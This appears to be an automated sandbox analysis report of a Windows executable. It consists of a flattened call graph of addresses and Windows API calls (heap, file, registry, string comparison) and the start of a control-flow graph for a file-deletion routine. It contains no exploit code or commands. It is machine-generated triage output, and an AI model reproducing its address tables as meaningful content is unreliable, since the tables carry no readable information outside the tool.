RtlFreeHeap GetLastError 49516->49568 49520 8f5dd1 49518->49520 49569 8e367f GetProcessHeap RtlFreeHeap GetLastError 49518->49569 49522 8f5ddf 49520->49522 49570 8e367f GetProcessHeap RtlFreeHeap GetLastError 49520->49570 49524 8f5ded 49522->49524 49571 8e367f GetProcessHeap RtlFreeHeap GetLastError 49522->49571 49535 8f5e2c 49524->49535 49543 8f5e1f 49524->49543 49572 901a7d GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49524->49572 49526 8f5e3d 49529 8f5e7c 49526->49529 49530 8f5e48 49526->49530 49527 8e55c9 3 API calls 49527->49535 49528 8e55c9 3 API calls 49528->49526 49577 911292 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49529->49577 49532 8f5e4d 49530->49532 49533 8f5e74 49530->49533 49537 8f5e6c 49532->49537 49538 8f5e52 49532->49538 49576 9130b4 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49533->49576 49535->49526 49535->49528 49536 8f5e62 49549 8f5e93 49536->49549 49575 916705 GetProcessHeap RtlFreeHeap GetLastError _memcpy_s 49537->49575 49541 8f5e57 49538->49541 49542 8f5e64 49538->49542 49541->49536 49573 919e34 GetProcessHeap RtlFreeHeap GetLastError 49541->49573 49574 9191ab GetProcessHeap RtlFreeHeap GetLastError 49542->49574 49543->49527 49545 8f5e8e 49545->49358 49548 8e367f GetProcessHeap RtlFreeHeap GetLastError 49545->49548 49548->49358 49550 8f5ea8 49549->49550 49551 8f5ea0 49549->49551 49554 8f5eb6 49550->49554 49579 8e367f GetProcessHeap RtlFreeHeap GetLastError 49550->49579 49578 8e367f GetProcessHeap RtlFreeHeap GetLastError 49551->49578 49555 8f5ec4 49554->49555 49580 8e367f GetProcessHeap RtlFreeHeap GetLastError 49554->49580 49557 8f5ed2 49555->49557 49581 8e367f GetProcessHeap RtlFreeHeap GetLastError 49555->49581 49558 8f5ee0 49557->49558 49582 8e367f GetProcessHeap RtlFreeHeap GetLastError 49557->49582 49561 8f5f02 _memcpy_s 49558->49561 49562 8f5ef4 49558->49562 49583 8e367f GetProcessHeap RtlFreeHeap GetLastError 49558->49583 49561->49545 49562->49561 49584 9415b5 GetProcessHeap RtlFreeHeap GetLastError 49562->49584 49565->49511 49566->49513 49567->49516 49568->49518 49569->49520 49570->49522 49571->49524 49572->49524 49573->49536 49574->49536 49575->49536 49576->49536 49577->49536 49578->49550 49579->49554 49580->49555 49581->49557 49582->49558 49583->49562 49584->49561 49585->49360 49586->49360 49588 9102c8 49587->49588 49593 91023e 49587->49593 49589 8f9fa4 49588->49589 49591 8e55c9 3 API calls 49588->49591 49589->49447 49627 94542a GetProcessHeap RtlFreeHeap GetLastError 49589->49627 49590 9102bf 49592 8e55c9 3 API calls 49590->49592 49591->49589 49592->49588 49593->49590 49594 8f5d86 3 API calls 49593->49594 49628 8ef6ce GetProcessHeap RtlFreeHeap GetLastError 49593->49628 49629 8e367f GetProcessHeap RtlFreeHeap GetLastError 49593->49629 49594->49593 49597->49373 49598->49376 49599->49376 49600->49379 49601->49383 49602->49387 49603->49394 49604->49396 49605->49398 49606->49399 49607->49402 49608->49404 49609->49406 49610->49408 49611->49409 49612->49412 49613->49414 49614->49416 49615->49418 49616->49420 49617->49422 49618->49424 49619->49426 49620->49428 49621->49430 49622->49431 49623->49434 49624->49446 49625->49438 49626->49441 49627->49447 49628->49593 49629->49593 49630->49457 49631->49453 49632->49471 49633->49485 49635 93ac4a 49634->49635 49636 93ac3f 49634->49636 49637 93ac71 49635->49637 49646 8e367f GetProcessHeap RtlFreeHeap GetLastError 49635->49646 49636->49635 49645 93aed3 76 API calls 49636->49645 49639 93ac87 49637->49639 49647 8e367f GetProcessHeap RtlFreeHeap GetLastError 49637->49647 49639->49182 49639->49183 49642->49187 49643->49188 49644->49186 49645->49635 49646->49637 49647->49639 50797 8f5180 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50798 923582 SetThreadExecutionState 50803 94ad80 CompareStringOrdinal GetLastError 50804 8e6999 EnterCriticalSection LeaveCriticalSection 49668 93a58b 49669 8e1839 68 API calls 49668->49669 49670 93a59c 49669->49670 49671 93a5a2 GetProcAddress GetProcAddress 49670->49671 49672 93a5d0 49670->49672 49671->49672 49673 93a5fb 49672->49673 49674 8e1839 68 API calls 49672->49674 49675 93a5f5 49674->49675 49675->49673 49676 93a619 GetProcAddress 49675->49676 49677 93a677 GetProcAddress 49676->49677 49678 93a638 49676->49678 49677->49673 49679 93a696 49677->49679 49678->49677 49680 93a63c GetLastError 49678->49680 49679->49673 49681 93a69a GetLastError 49679->49681 49682 93a648 49680->49682 49681->49682 49682->49673 49685 8e7d90 261 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 49686 94058b 49687 940599 CoInitialize 49686->49687 49691 9405ab 49686->49691 49687->49691 49688 9405df CLSIDFromProgID 49689 9405f4 CLSIDFromProgID 49688->49689 49690 9405af 49688->49690 49689->49690 49691->49688 49691->49690 50806 92e18d 44 API calls __freea 50808 94c1b1 16 API calls ___delayLoadHelper2@8 50812 8e97a0 67 API calls 50813 9061a0 58 API calls 50814 90fba1 CompareStringW CompareStringOrdinal GetLastError 50815 9305a0 15 API calls 2 library calls 50605 93f5a7 50606 8e18c0 62 API calls 50605->50606 50607 93f5c3 50606->50607 50608 93f5c9 50607->50608 50630 943be0 50607->50630 50615 93f74e 50608->50615 50642 8e367f GetProcessHeap RtlFreeHeap GetLastError 50608->50642 50610 93f5fc GetProcAddress 50611 93f620 GetProcAddress 50610->50611 50612 93f61b 50610->50612 50613 93f644 GetProcAddress 50611->50613 50614 93f63f 50611->50614 50612->50611 50616 93f663 50613->50616 50617 93f668 GetProcAddress 50613->50617 50614->50613 50616->50617 50619 93f687 50617->50619 50620 93f68c GetProcAddress 50617->50620 50619->50620 50621 93f6b0 GetProcAddress 50620->50621 50622 93f6ab 50620->50622 50623 93f6d4 GetProcAddress 50621->50623 50624 93f6cf 50621->50624 50622->50621 50625 93f6f3 50623->50625 50624->50623 50626 93f701 GetProcAddress 50625->50626 50627 93f717 50625->50627 50626->50627 50628 93f720 GetProcAddress 50627->50628 50629 93f736 50627->50629 50628->50629 50629->50608 50631 943c03 50630->50631 50632 943c51 GlobalAlloc 50631->50632 50633 943c09 GetLastError 50631->50633 50635 943c89 50632->50635 50638 943c22 50632->50638 50634 943c15 50633->50634 50634->50632 50634->50638 50636 943ca4 50635->50636 50637 943c98 GetLastError 50635->50637 50639 943cf6 GetLastError 50636->50639 50641 943cb1 50636->50641 50637->50636 50638->50610 50639->50641 50640 943d45 GlobalFree 50640->50638 50641->50640 50642->50615 50821 8e65b0 66 API calls 50822 90e1d0 43 API calls _memcpy_s 50825 8e15c8 73 API calls 50826 92a7da 54 API calls 3 library calls 50827 8f9bc6 82 API calls 50828 8e8dc0 6 API calls 49658 90ddc0 49661 8e540b GetProcessHeap RtlAllocateHeap 49658->49661 49660 90ddcd 49661->49660 50831 909dc0 336 API calls 50835 9227c9 139 API calls 50151 90dff0 50156 90eb41 50151->50156 50153 90e01f ReadFile 50154 90e037 GetLastError 50153->50154 50155 90e043 50153->50155 50154->50155 50157 90eb56 50156->50157 50158 90eb5c SetFilePointerEx 50157->50158 50160 90eb7f 50157->50160 50159 90eb73 GetLastError 50158->50159 50158->50160 50159->50160 50160->50153 50837 9269f3 14 API calls 50840 8e6be8 8 API calls 50841 9019f9 78 API calls 50843 8e69e0 10 API calls 50844 8e99e0 70 API calls 50845 9235e3 GetProcessHeap RtlFreeHeap GetLastError 50846 90f9e3 77 API calls 50847 940fe0 74 API calls 50848 92a1e8 52 API calls 4 library calls 50849 8e71f5 80 API calls 50850 8e91f0 56 API calls 50851 8e9df0 79 API calls 50853 90d515 97 API calls 50855 931503 44 API calls 2 library calls 49662 8e7b1f 177 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50856 8e711f 370 API calls 50860 90fb05 65 API calls 50861 90f530 131 API calls 50164 94c331 50165 94c33b 50164->50165 50166 94c6ef ___delayLoadHelper2@8 16 API calls 50165->50166 50167 94c348 50166->50167 50863 923337 255 API calls 50864 92a13b 41 API calls 4 library calls 50865 8e9720 16 API calls 50173 8e1121 50174 8e113c 50173->50174 50183 8e79d1 50174->50183 50178 8e114d 50179 8e11a5 50178->50179 50189 8e367f GetProcessHeap RtlFreeHeap GetLastError 50178->50189 50181 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 50179->50181 50182 8e11bb 50181->50182 50184 8e79e7 lstrlenW 50183->50184 50187 8e79fc 50183->50187 50184->50187 50185 8e1144 50188 8e1651 HeapSetInformation 50185->50188 50186 8e7a15 CompareStringW 50186->50185 50187->50185 50187->50186 50188->50178 50189->50179 50867 936320 51 API calls 50868 902d27 79 API calls 50870 8e8f30 54 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50871 927150 51 API calls _unexpected 50872 929350 6 API calls 4 library calls 50873 932f50 FreeLibrary 50876 8f90f5 9 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50877 8e6750 72 API calls 50878 90f170 117 API calls 50879 8e696f 177 API calls 50880 90f971 76 API calls 50885 8e9360 54 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50886 8e9960 53 API calls 50199 8e677f InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 50200 8e67e5 50199->50200 50201 8e67f1 GetCurrentProcess 50200->50201 50210 93b796 OpenProcessToken 50201->50210 50203 8e6804 50215 90469c 50203->50215 50205 8e681e 50208 8e6824 50205->50208 50282 8edb61 50205->50282 50211 93b7f8 GetTokenInformation 50210->50211 50212 93b7be GetLastError 50210->50212 50213 93b820 GetLastError 50211->50213 50214 93b7ca 50211->50214 50212->50214 50213->50214 50214->50203 50225 904910 50215->50225 50273 9046d7 50215->50273 50216 9046fb CompareStringW 50217 90572b CompareStringW 50216->50217 50218 90471b CompareStringW 50216->50218 50217->50273 50218->50217 50219 90473e CompareStringW 50218->50219 50219->50217 50220 904761 CompareStringW 50219->50220 50222 904784 CompareStringW 50220->50222 50220->50273 50221 9058da 50223 9047a7 CompareStringW 50222->50223 50222->50273 50224 9047ca CompareStringW 50223->50224 50223->50273 50226 9047ed CompareStringW 50224->50226 50224->50273 50225->50205 50227 904810 CompareStringW 50226->50227 50226->50273 50228 904833 CompareStringW 50227->50228 50227->50273 50229 904856 CompareStringW 50228->50229 50228->50273 50230 904884 CompareStringW 50229->50230 50229->50273 50231 90495d CompareStringW 50230->50231 50230->50273 50232 90499a CompareStringW 50231->50232 50231->50273 50233 9049d8 CompareStringW 50232->50233 50232->50273 50234 904a16 CompareStringW 50233->50234 50233->50273 50235 904a54 CompareStringW 50234->50235 50234->50273 50236 904a77 CompareStringW 50235->50236 50235->50273 50237 904a9a CompareStringW 50236->50237 50236->50273 50238 904ac5 CompareStringW 50237->50238 50237->50273 50239 904afb CompareStringW 50238->50239 50238->50273 50240 904b28 CompareStringW 50239->50240 50239->50273 50241 904b89 CompareStringW 50240->50241 50240->50273 50242 904bea CompareStringW 50241->50242 50241->50273 50243 904c3d CompareStringW 50242->50243 50242->50273 50244 904c90 lstrlenW CompareStringW 50243->50244 50243->50273 50246 904d58 CompareStringW 50244->50246 50247 904cba lstrlenW 50244->50247 50245 8e2eaf 52 API calls 50245->50273 50248 904e56 lstrlenW lstrlenW CompareStringW 50246->50248 50246->50273 50247->50273 50249 904f7a lstrlenW lstrlenW CompareStringW 50248->50249 50248->50273 50250 905010 CompareStringW 50249->50250 50251 904faa lstrlenW 50249->50251 50252 9050a6 CompareStringW 50250->50252 50250->50273 50251->50273 50255 9050e9 CompareStringW 50252->50255 50252->50273 50253 8e5573 6 API calls 50253->50273 50254 8e8119 72 API calls 50254->50273 50257 90510a CompareStringW 50255->50257 50255->50273 50256 904ef6 lstrlenW 50256->50273 50258 90512d CompareStringW 50257->50258 50257->50273 50260 905150 CompareStringW 50258->50260 50258->50273 50259 9029f3 52 API calls 50259->50273 50261 905173 CompareStringW 50260->50261 50260->50273 50262 905196 CompareStringW 50261->50262 50261->50273 50263 9051bc CompareStringW 50262->50263 50262->50273 50264 9051e2 CompareStringW 50263->50264 50263->50273 50265 905210 CompareStringW 50264->50265 50264->50273 50266 90527b lstrlenW lstrlenW CompareStringW 50265->50266 50265->50273 50267 905320 lstrlenW lstrlenW CompareStringW 50266->50267 50268 9052ab lstrlenW 50266->50268 50269 905350 lstrlenW 50267->50269 50270 9053c8 lstrlenW lstrlenW CompareStringW 50267->50270 50268->50273 50269->50273 50271 905463 lstrlenW lstrlenW CompareStringW 50270->50271 50272 9053f8 lstrlenW 50270->50272 50274 905522 lstrlenW lstrlenW CompareStringW 50271->50274 50275 905497 lstrlenW 50271->50275 50272->50273 50273->50216 50273->50217 50273->50221 50273->50225 50273->50245 50273->50253 50273->50254 50273->50255 50273->50256 50273->50259 50273->50265 50273->50267 50273->50270 50276 8e417b 60 API calls 50273->50276 50279 90567a lstrlenW lstrlenW CompareStringW 50273->50279 50277 905552 lstrlenW 50274->50277 50278 9055cb lstrlenW lstrlenW CompareStringW 50274->50278 50281 9054b7 50275->50281 50276->50273 50277->50281 50278->50279 50280 9055fb lstrlenW 50278->50280 50279->50273 50280->50273 50281->50274 50281->50278 50283 8edb9a _memcpy_s 50282->50283 50284 8edc18 SetFilePointerEx 50283->50284 50285 8edbd8 GetLastError 50283->50285 50287 8edc74 ReadFile 50284->50287 50288 8edc34 GetLastError 50284->50288 50296 8edbe4 50285->50296 50289 8edcce 50287->50289 50290 8edc8e GetLastError 50287->50290 50288->50296 50291 8edcea SetFilePointerEx 50289->50291 50289->50296 50290->50296 50292 8edd3e ReadFile 50291->50292 50293 8edcfe GetLastError 50291->50293 50294 8edd9b 50292->50294 50295 8edd5b GetLastError 50292->50295 50293->50296 50294->50296 50297 8eddb8 SetFilePointerEx 50294->50297 50295->50296 50298 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 50296->50298 50299 8ede1f ReadFile 50297->50299 50300 8edddf GetLastError 50297->50300 50301 8e6847 50298->50301 50302 8ede7c ReadFile 50299->50302 50303 8ede3c GetLastError 50299->50303 50300->50296 50301->50208 50327 8ff511 50301->50327 50304 8eded9 SetFilePointerEx 50302->50304 50305 8ede99 GetLastError 50302->50305 50303->50296 50306 8edf38 ReadFile 50304->50306 50307 8edef8 GetLastError 50304->50307 50305->50296 50308 8edfbc GetLastError 50306->50308 50309 8edf5c 50306->50309 50307->50296 50308->50296 50309->50296 50310 8ee00e 50309->50310 50311 8edf96 ReadFile 50309->50311 50320 8ee0b2 50309->50320 50310->50296 50355 8e540b GetProcessHeap RtlAllocateHeap 50310->50355 50311->50308 50311->50309 50313 8ee054 50313->50296 50314 8ee08f SetFilePointerEx 50313->50314 50315 8ee0ef ReadFile 50314->50315 50316 8ee0a6 GetLastError 50314->50316 50317 8ee114 GetLastError 50315->50317 50318 8ee14b 50315->50318 50316->50320 50322 8ee120 50317->50322 50318->50322 50356 943b63 GetFileSizeEx GetLastError 50318->50356 50319 8e55c9 3 API calls 50319->50296 50320->50296 50320->50319 50322->50320 50323 8ee202 50357 8e540b GetProcessHeap RtlAllocateHeap 50323->50357 50325 8ee2aa _memcpy_s 50358 8ed84a GetModuleHandleW GetLastError 50325->50358 50359 94267a 50327->50359 50330 8e3db5 52 API calls 50331 8ff56f 50330->50331 50332 8ff530 50331->50332 50333 8e3cfd 52 API calls 50331->50333 50334 8ff74b 50332->50334 50408 8e367f GetProcessHeap RtlFreeHeap GetLastError 50332->50408 50336 8ff597 50333->50336 50334->50208 50336->50332 50369 94672f 50336->50369 50338 8ff636 50339 8e2eaf 52 API calls 50338->50339 50341 8ff601 50339->50341 50340 8ff5ce 50340->50332 50340->50338 50342 8ff61b 50340->50342 50343 8ff5fb 50340->50343 50341->50332 50381 941ec9 50341->50381 50342->50338 50407 93acf6 72 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50342->50407 50345 8e3cfd 52 API calls 50343->50345 50345->50341 50348 94267a 72 API calls 50349 8ff6a9 50348->50349 50349->50332 50350 8e3db5 52 API calls 50349->50350 50351 8ff6d9 50350->50351 50351->50332 50352 8e3cfd 52 API calls 50351->50352 50353 8ff6fe 50352->50353 50353->50332 50394 8fcb06 50353->50394 50355->50313 50356->50323 50357->50325 50358->50322 50360 9426b2 50359->50360 50368 94285b 50359->50368 50360->50368 50409 9429ea 50360->50409 50362 94289f 50364 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 50362->50364 50367 8ff52a 50364->50367 50367->50330 50367->50332 50368->50362 50423 8e367f GetProcessHeap RtlFreeHeap GetLastError 50368->50423 50424 9465ae 50369->50424 50372 946774 50374 9467ed 50372->50374 50375 9467fe 50372->50375 50377 9467f9 50372->50377 50374->50377 50434 8e367f GetProcessHeap RtlFreeHeap GetLastError 50374->50434 50378 8e2eaf 52 API calls 50375->50378 50376 9467d6 RegCloseKey 50376->50372 50377->50340 50378->50377 50380 946751 50380->50372 50380->50376 50382 941ee2 50381->50382 50390 941f01 50381->50390 50382->50390 50436 941cac 50382->50436 50385 941cac 73 API calls 50386 941f26 50385->50386 50387 941f3c CompareStringW 50386->50387 50386->50390 50388 941f53 GetLastError 50387->50388 50387->50390 50388->50390 50389 941fd2 50392 8ff669 50389->50392 50455 8e367f GetProcessHeap RtlFreeHeap GetLastError 50389->50455 50390->50389 50454 8e367f GetProcessHeap RtlFreeHeap GetLastError 50390->50454 50392->50332 50392->50348 50395 8e4dd8 70 API calls 50394->50395 50396 8fcb1a 50395->50396 50397 8e3cfd 52 API calls 50396->50397 50402 8fcb20 50396->50402 50398 8fcb4d 50397->50398 50398->50402 50462 8fc930 50398->50462 50401 8fcc14 50401->50332 50402->50401 50485 8e367f GetProcessHeap RtlFreeHeap GetLastError 50402->50485 50406 942127 73 API calls 50406->50402 50407->50338 50408->50334 50410 8e1839 68 API calls 50409->50410 50411 942a07 50410->50411 50412 942a40 GetProcAddress 50411->50412 50415 942a11 50411->50415 50412->50415 50418 942a86 50412->50418 50413 942b17 50416 94284a 50413->50416 50417 942b1d FreeLibrary 50413->50417 50414 942b0e CoTaskMemFree 50414->50413 50415->50413 50415->50414 50416->50362 50416->50368 50422 9424d0 53 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50416->50422 50417->50416 50418->50415 50419 8e2eaf 52 API calls 50418->50419 50420 942ac4 50419->50420 50420->50415 50421 8e3cfd 52 API calls 50420->50421 50421->50415 50422->50368 50423->50362 50425 8e3db5 52 API calls 50424->50425 50426 9465c8 50425->50426 50427 9465ce 50426->50427 50428 93cba8 RegOpenKeyExW 50426->50428 50429 946666 50427->50429 50435 8e367f GetProcessHeap RtlFreeHeap GetLastError 50427->50435 50431 946603 50428->50431 50429->50372 50429->50380 50433 93cd94 58 API calls 50429->50433 50431->50427 50432 94664c RegCloseKey 50431->50432 50432->50427 50433->50380 50434->50377 50435->50429 50437 8e2eaf 52 API calls 50436->50437 50440 941ccc 50437->50440 50438 941d31 50441 941d45 50438->50441 50456 941bf5 72 API calls 50438->50456 50439 941d8a 50450 941d60 50439->50450 50458 8e367f GetProcessHeap RtlFreeHeap GetLastError 50439->50458 50440->50438 50440->50439 50452 941cd2 50440->50452 50441->50450 50457 941e65 53 API calls 50441->50457 50442 941e5c 50442->50385 50442->50390 50446 941db2 50449 8e3cfd 52 API calls 50446->50449 50446->50452 50453 941dd8 50446->50453 50449->50453 50450->50446 50450->50452 50459 8e2d5d 52 API calls _memcpy_s 50450->50459 50452->50442 50461 8e367f GetProcessHeap RtlFreeHeap GetLastError 50452->50461 50453->50452 50460 8e50cb 52 API calls _memcpy_s 50453->50460 50454->50389 50455->50392 50456->50441 50457->50450 50458->50450 50459->50446 50460->50452 50461->50442 50486 8e5444 50462->50486 50464 8fc955 50465 8fc997 50464->50465 50476 8fc95b 50464->50476 50536 8e417b 60 API calls 50464->50536 50465->50476 50478 8fca32 50465->50478 50495 946814 50465->50495 50468 8fcaf0 50471 8fcafe 50468->50471 50547 8e367f GetProcessHeap RtlFreeHeap GetLastError 50468->50547 50469 8fca99 50473 8e2eaf 52 API calls 50469->50473 50470 8fca75 50507 946323 50470->50507 50471->50402 50480 945cb8 UuidCreate 50471->50480 50473->50476 50476->50468 50546 8e367f GetProcessHeap RtlFreeHeap GetLastError 50476->50546 50478->50469 50478->50470 50478->50476 50481 945cfb StringFromGUID2 50480->50481 50483 945ce8 50480->50483 50481->50483 50482 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 50484 8fcba8 50482->50484 50483->50482 50484->50402 50484->50406 50485->50401 50487 8e5463 50486->50487 50488 8e54bb 50487->50488 50489 8e5528 50487->50489 50493 8e5469 50487->50493 50548 8e593a GetProcessHeap HeapSize 50488->50548 50550 8e540b GetProcessHeap RtlAllocateHeap 50489->50550 50492 8e54ca 50492->50493 50549 8e56c2 GetProcessHeap HeapReAlloc 50492->50549 50493->50464 50496 9465ae 54 API calls 50495->50496 50497 94682d 50496->50497 50498 946859 50497->50498 50506 946836 50497->50506 50551 93cffa 50497->50551 50500 9468d8 50498->50500 50501 9468e9 50498->50501 50504 8fc9fa 50498->50504 50500->50504 50557 8e367f GetProcessHeap RtlFreeHeap GetLastError 50500->50557 50502 8e2eaf 52 API calls 50501->50502 50502->50504 50503 9468c1 RegCloseKey 50503->50498 50504->50476 50504->50478 50537 945f3a 50504->50537 50506->50498 50506->50503 50508 8e1839 68 API calls 50507->50508 50509 946348 50508->50509 50510 94636c GetProcAddress 50509->50510 50521 94634e 50509->50521 50511 94638a GetCurrentProcess 50510->50511 50529 9463ea 50510->50529 50594 93beb7 12 API calls 50511->50594 50512 93cba8 RegOpenKeyExW 50514 946429 50512->50514 50514->50521 50522 9464ff 50514->50522 50582 946232 50514->50582 50515 94639a 50515->50521 50515->50529 50595 94234b 77 API calls 50515->50595 50516 94658c RegCloseKey 50517 946599 50516->50517 50518 9465a7 50517->50518 50601 8e367f GetProcessHeap RtlFreeHeap GetLastError 50517->50601 50518->50476 50521->50516 50521->50517 50522->50521 50599 94234b 77 API calls 50522->50599 50523 9463c5 50523->50521 50596 8e5573 6 API calls 50523->50596 50526 946531 50526->50521 50600 8e5573 6 API calls 50526->50600 50529->50512 50529->50521 50531 9464a0 50531->50521 50533 946232 59 API calls 50531->50533 50534 9464d8 50533->50534 50534->50521 50534->50522 50598 8e5573 6 API calls 50534->50598 50536->50465 50538 945f85 50537->50538 50539 945f4e 50537->50539 50541 8e29c8 52 API calls 50538->50541 50540 8e37f3 2 API calls 50539->50540 50543 945f59 50540->50543 50541->50543 50542 945fbc GetLastError 50542->50543 50543->50542 50544 945f5f 50543->50544 50545 8e29c8 52 API calls 50543->50545 50544->50478 50545->50543 50546->50468 50547->50471 50548->50492 50549->50493 50550->50493 50552 93d011 50551->50552 50553 93d020 50551->50553 50552->50553 50573 8e593a GetProcessHeap HeapSize 50552->50573 50556 93d026 50553->50556 50558 93d0cb 50553->50558 50556->50506 50557->50504 50574 93c287 50558->50574 50560 93d252 50560->50556 50564 93d0f5 50565 93d1d9 50564->50565 50567 93d110 50564->50567 50569 93c287 RegQueryValueExW 50564->50569 50578 8e56c2 GetProcessHeap HeapReAlloc 50564->50578 50579 8e540b GetProcessHeap RtlAllocateHeap 50564->50579 50565->50567 50580 8e5a09 56 API calls 50565->50580 50567->50560 50581 8e367f GetProcessHeap RtlFreeHeap GetLastError 50567->50581 50568 93d1f9 50568->50567 50570 93d21e lstrlenW 50568->50570 50569->50564 50570->50560 50571 93d23e 50570->50571 50572 8e55c9 3 API calls 50571->50572 50572->50567 50573->50553 50575 93c2d8 RegQueryValueExW 50574->50575 50577 93c2a2 50574->50577 50575->50577 50577->50564 50578->50564 50579->50564 50580->50568 50581->50560 50583 93cffa 58 API calls 50582->50583 50584 946254 50583->50584 50585 946277 50584->50585 50586 9462bf 50584->50586 50587 94629a 50584->50587 50589 94631b 50585->50589 50602 8e367f GetProcessHeap RtlFreeHeap GetLastError 50585->50602 50588 8e2eaf 52 API calls 50586->50588 50590 945f3a 53 API calls 50587->50590 50591 9462a5 50588->50591 50589->50521 50589->50531 50597 8e5573 6 API calls 50589->50597 50590->50591 50591->50585 50593 8e3cfd 52 API calls 50591->50593 50593->50585 50594->50515 50595->50523 50596->50529 50597->50531 50598->50522 50599->50526 50600->50521 50601->50518 50602->50589 50888 8f757c 62 API calls 50891 8e6570 73 API calls 50892 8e8d70 6 API calls 50694 94c16b 16 API calls ___delayLoadHelper2@8

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 008E5C81 Relevance: 65.2, APIs: 19, Strings: 18, Instructions: 479fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 194 8e5c81-8e5cf2 call 927460 * 2 GetFileAttributesW 199 8e5cf4-8e5cfe GetLastError 194->199 200 8e5d61-8e5d63 194->200 203 8e5d0b 199->203 204 8e5d00-8e5d09 199->204 201 8e5d69-8e5d6b 200->201 202 8e6275-8e6296 call 8e1225 200->202 205 8e5d6d-8e5d7b SetFileAttributesW 201->205 206 8e5dda-8e5de1 201->206 218 8e629b-8e62a1 call 8e1228 202->218 207 8e5d0d-8e5d12 203->207 208 8e5d14-8e5d1b 203->208 204->203 205->206 212 8e5d7d-8e5d87 GetLastError 205->212 210 8e5ded-8e5df1 206->210 211 8e5de3-8e5de7 206->211 213 8e5d2b-8e5d47 call 8e1225 207->213 214 8e5d1d-8e5d23 208->214 215 8e5d25 208->215 221 8e5e28-8e5e3e call 8e3db5 210->221 222 8e5df3-8e5e05 call 8e4dd8 210->222 211->210 220 8e615c-8e6167 RemoveDirectoryW 211->220 223 8e5d89-8e5d92 212->223 224 8e5d94 212->224 243 8e5d4c-8e5d55 call 8e1228 213->243 214->215 217 8e5d27-8e5d29 214->217 215->217 217->213 227 8e5d5a-8e5d5c 217->227 231 8e62a4-8e62ad 218->231 230 8e616d-8e6177 GetLastError 220->230 220->231 248 8e5e5a-8e5e76 FindFirstFileW 221->248 249 8e5e40-8e5e50 221->249 222->221 254 8e5e07-8e5e23 call 8e1228 222->254 223->224 232 8e5d9d-8e5da4 224->232 233 8e5d96-8e5d9b 224->233 242 8e62b6-8e62bd 227->242 234 8e6179-8e617c 230->234 235 8e6182-8e6188 230->235 241 8e62af-8e62b0 FindClose 231->241 231->242 237 8e5dae 232->237 238 8e5da6-8e5dac 232->238 236 8e5db4-8e5dd5 call 8e1225 233->236 234->235 245 8e618a-8e618e 235->245 246 8e61a1-8e61a8 235->246 236->243 247 8e5db0-8e5db2 237->247 238->237 238->247 241->242 251 8e62bf-8e62c5 call 8e367f 242->251 252 8e62ca-8e62d1 242->252 243->242 255 8e61d5-8e61f1 call 8e1225 245->255 256 8e6190-8e619d MoveFileExW 245->256 257 8e61aa-8e61b0 246->257 258 8e61f6-8e61f8 246->258 247->227 247->236 259 8e5ebc-8e5ec6 248->259 260 8e5e78-8e5e82 GetLastError 248->260 249->248 251->252 264 8e62de-8e62e5 252->264 265 8e62d3-8e62d9 call 8e367f 252->265 254->242 255->218 256->255 267 8e619f 256->267 257->258 268 8e61b2-8e61b8 257->268 258->231 276 8e5eed-8e5f17 call 8e2476 259->276 277 8e5ec8-8e5ed1 259->277 274 8e5e8f 260->274 275 8e5e84-8e5e8d 260->275 271 8e62e7-8e62ed call 8e367f 264->271 272 8e62f2-8e6302 call 9267e6 264->272 265->264 267->246 281 8e61cd-8e61cf 268->281 282 8e61ba-8e61c1 268->282 271->272 283 8e5e96-8e5eb2 call 8e1225 274->283 284 8e5e91 274->284 275->274 295 8e5f1d-8e5f35 call 8e3db5 276->295 296 8e625b-8e6265 276->296 278 8e60b7-8e60c7 FindNextFileW 277->278 279 8e5ed7-8e5ede 277->279 292 8e614d-8e6156 GetLastError 278->292 293 8e60cd-8e60d3 278->293 279->276 288 8e5ee0-8e5ee7 279->288 281->231 281->255 282->255 290 8e61c3-8e61c7 282->290 283->259 284->283 288->276 288->278 290->231 290->281 292->220 298 8e61fd-8e6207 GetLastError 292->298 293->259 307 8e5f3b-8e5f3f 295->307 308 8e6239-8e6259 call 8e1228 295->308 302 8e626a-8e6273 call 8e1228 296->302 300 8e6209-8e6212 298->300 301 8e6214 298->301 300->301 303 8e621b-8e6237 call 8e1225 301->303 304 8e6216 301->304 302->231 303->218 304->303 313 8e5fa4-8e5fab 307->313 314 8e5f41-8e5f48 307->314 308->231 316 8e60b1 313->316 317 8e5fb1-8e5fb8 313->317 314->313 315 8e5f4a-8e5f5a call 8e3cfd 314->315 329 8e60d8-8e60ed 